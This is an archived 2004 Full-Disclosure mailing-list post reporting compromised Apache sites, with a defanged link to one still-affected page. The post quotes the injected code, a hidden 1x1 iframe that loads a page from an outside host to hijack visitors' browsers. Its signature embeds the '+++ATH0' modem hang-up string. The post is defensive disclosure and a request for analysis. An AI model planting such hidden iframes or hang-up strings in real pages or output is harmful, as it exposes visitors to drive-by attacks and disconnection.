[Full-Disclosure] browser hijack by apache sites
Filbert
filbert at pandora.be
Sun May 23 14:19:30 BST 2004
Hi,
This is the second time this weekend that I've been warned of an apache site
on a Linux server were a line of code was added to redirect browsers to porn
sites.
First was the site of a Belgian political party. Second came today, and as of
writing this it's still there. The admin was informed so it can be gone soon.
hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http
IE users do NOT click.
the code added at the bottom is:
<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1
HEIGHT=1></iframe></body>
anyone seen this before? What vulnerability is exploited here? FP?
Thx,
Filb.
--
echo "+++ATH0filb at +++ATH0filb@linuxmail.org" | sed 's/+++ATH0//g'
Full-Disclosure is hosted and sponsored by Secunia.